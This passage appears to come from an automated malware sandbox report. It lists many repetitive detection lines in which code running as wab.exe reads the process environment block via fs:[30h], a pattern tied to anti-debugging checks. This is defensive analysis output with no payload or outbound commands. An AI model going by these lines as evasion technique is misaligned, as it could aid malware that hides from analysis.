            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036F53FC mov eax, dword ptr fs:[00000030h] 4_2_036F53FC
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0363E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0363E3F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036563FF mov eax, dword ptr fs:[00000030h] 4_2_036563FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036DC3CD mov eax, dword ptr fs:[00000030h] 4_2_036DC3CD
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0362A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0362A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036283C0 mov eax, dword ptr fs:[00000030h] 4_2_036283C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036DB3D0 mov ecx, dword ptr fs:[00000030h] 4_2_036DB3D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036433A5 mov eax, dword ptr fs:[00000030h] 4_2_036433A5
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036533A0 mov eax, dword ptr fs:[00000030h] 4_2_036533A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0361E388 mov eax, dword ptr fs:[00000030h] 4_2_0361E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0364438F mov eax, dword ptr fs:[00000030h] 4_2_0364438F
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_036F539D mov eax, dword ptr fs:[00000030h] 4_2_036F539D
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_03618397 mov eax, dword ptr fs:[00000030h] 4_2_03618397
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4_2_0367739A mov eax, dword ptr fs:[00000030h] 4_2_0367739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0367739A mov eax, dword ptr fs:[00000030h]4_2_0367739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03624260 mov eax, dword ptr fs:[00000030h]4_2_03624260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03624260 mov eax, dword ptr fs:[00000030h]4_2_03624260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03624260 mov eax, dword ptr fs:[00000030h]4_2_03624260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036ED26B mov eax, dword ptr fs:[00000030h]4_2_036ED26B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036ED26B mov eax, dword ptr fs:[00000030h]4_2_036ED26B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361826B mov eax, dword ptr fs:[00000030h]4_2_0361826B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03649274 mov eax, dword ptr fs:[00000030h]4_2_03649274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03661270 mov eax, dword ptr fs:[00000030h]4_2_03661270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03661270 mov eax, dword ptr fs:[00000030h]4_2_03661270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619240 mov eax, dword ptr fs:[00000030h]4_2_03619240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619240 mov eax, dword ptr fs:[00000030h]4_2_03619240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365724D mov eax, dword ptr fs:[00000030h]4_2_0365724D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A250 mov eax, dword ptr fs:[00000030h]4_2_0361A250
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DB256 mov eax, dword ptr fs:[00000030h]4_2_036DB256
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DB256 mov eax, dword ptr fs:[00000030h]4_2_036DB256
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03626259 mov eax, dword ptr fs:[00000030h]4_2_03626259
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5227 mov eax, dword ptr fs:[00000030h]4_2_036F5227
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361823B mov eax, dword ptr fs:[00000030h]4_2_0361823B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03657208 mov eax, dword ptr fs:[00000030h]4_2_03657208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03657208 mov eax, dword ptr fs:[00000030h]4_2_03657208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302E1 mov eax, dword ptr fs:[00000030h]4_2_036302E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302E1 mov eax, dword ptr fs:[00000030h]4_2_036302E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302E1 mov eax, dword ptr fs:[00000030h]4_2_036302E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F52E2 mov eax, dword ptr fs:[00000030h]4_2_036F52E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DF2F8 mov eax, dword ptr fs:[00000030h]4_2_036DF2F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036192FF mov eax, dword ptr fs:[00000030h]4_2_036192FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036292C5 mov eax, dword ptr fs:[00000030h]4_2_036292C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036292C5 mov eax, dword ptr fs:[00000030h]4_2_036292C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B2D3 mov eax, dword ptr fs:[00000030h]4_2_0361B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B2D3 mov eax, dword ptr fs:[00000030h]4_2_0361B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B2D3 mov eax, dword ptr fs:[00000030h]4_2_0361B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364F2D0 mov eax, dword ptr fs:[00000030h]4_2_0364F2D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364F2D0 mov eax, dword ptr fs:[00000030h]4_2_0364F2D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302A0 mov eax, dword ptr fs:[00000030h]4_2_036302A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302A0 mov eax, dword ptr fs:[00000030h]4_2_036302A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B72A0 mov eax, dword ptr fs:[00000030h]4_2_036B72A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B72A0 mov eax, dword ptr fs:[00000030h]4_2_036B72A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov ecx, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov eax, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov eax, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov ecx, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov ecx, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365E284 mov eax, dword ptr fs:[00000030h]4_2_0365E284
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365E284 mov eax, dword ptr fs:[00000030h]4_2_0365E284
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A0283 mov eax, dword ptr fs:[00000030h]4_2_036A0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A0283 mov eax, dword ptr fs:[00000030h]4_2_036A0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A0283 mov eax, dword ptr fs:[00000030h]4_2_036A0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5283 mov eax, dword ptr fs:[00000030h]4_2_036F5283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365329E mov eax, dword ptr fs:[00000030h]4_2_0365329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365329E mov eax, dword ptr fs:[00000030h]4_2_0365329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B9179 mov eax, dword ptr fs:[00000030h]4_2_036B9179
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov ecx, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03627152 mov eax, dword ptr fs:[00000030h]4_2_03627152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B8158 mov eax, dword ptr fs:[00000030h]4_2_036B8158
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03626154 mov eax, dword ptr fs:[00000030h]4_2_03626154
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03626154 mov eax, dword ptr fs:[00000030h]4_2_03626154
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361C156 mov eax, dword ptr fs:[00000030h]4_2_0361C156
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5152 mov eax, dword ptr fs:[00000030h]4_2_036F5152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03650124 mov eax, dword ptr fs:[00000030h]4_2_03650124
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03621131 mov eax, dword ptr fs:[00000030h]4_2_03621131
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03621131 mov eax, dword ptr fs:[00000030h]4_2_03621131
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B136 mov eax, dword ptr fs:[00000030h]4_2_0361B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov ecx, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov eax, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov eax, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA118 mov eax, dword ptr fs:[00000030h]4_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E0115 mov eax, dword ptr fs:[00000030h]4_2_036E0115
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F61E5 mov eax, dword ptr fs:[00000030h]4_2_036F61E5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036451EF mov eax, dword ptr fs:[00000030h]4_2_036451EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036251ED mov eax, dword ptr fs:[00000030h]4_2_036251ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036C71F9 mov esi, dword ptr fs:[00000030h]4_2_036C71F9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036501F8 mov eax, dword ptr fs:[00000030h]4_2_036501F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F51CB mov eax, dword ptr fs:[00000030h]4_2_036F51CB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E61C3 mov eax, dword ptr fs:[00000030h]4_2_036E61C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E61C3 mov eax, dword ptr fs:[00000030h]4_2_036E61C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365D1D0 mov eax, dword ptr fs:[00000030h]4_2_0365D1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365D1D0 mov ecx, dword ptr fs:[00000030h]4_2_0365D1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E1D0 mov eax, dword ptr fs:[00000030h]4_2_0369E1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D11A4 mov eax, dword ptr fs:[00000030h]4_2_036D11A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363B1B0 mov eax, dword ptr fs:[00000030h]4_2_0363B1B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03660185 mov eax, dword ptr fs:[00000030h]4_2_03660185
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DC188 mov eax, dword ptr fs:[00000030h]4_2_036DC188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DC188 mov eax, dword ptr fs:[00000030h]4_2_036DC188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A019F mov eax, dword ptr fs:[00000030h]4_2_036A019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A197 mov eax, dword ptr fs:[00000030h]4_2_0361A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A197 mov eax, dword ptr fs:[00000030h]4_2_0361A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A197 mov eax, dword ptr fs:[00000030h]4_2_0361A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03677190 mov eax, dword ptr fs:[00000030h]4_2_03677190
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A106E mov eax, dword ptr fs:[00000030h]4_2_036A106E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5060 mov eax, dword ptr fs:[00000030h]4_2_036F5060
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov eax, dword ptr fs:[00000030h]4_2_03631070
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631070 mov ecx, dword ptr fs:[00000030h]4_2_03631070
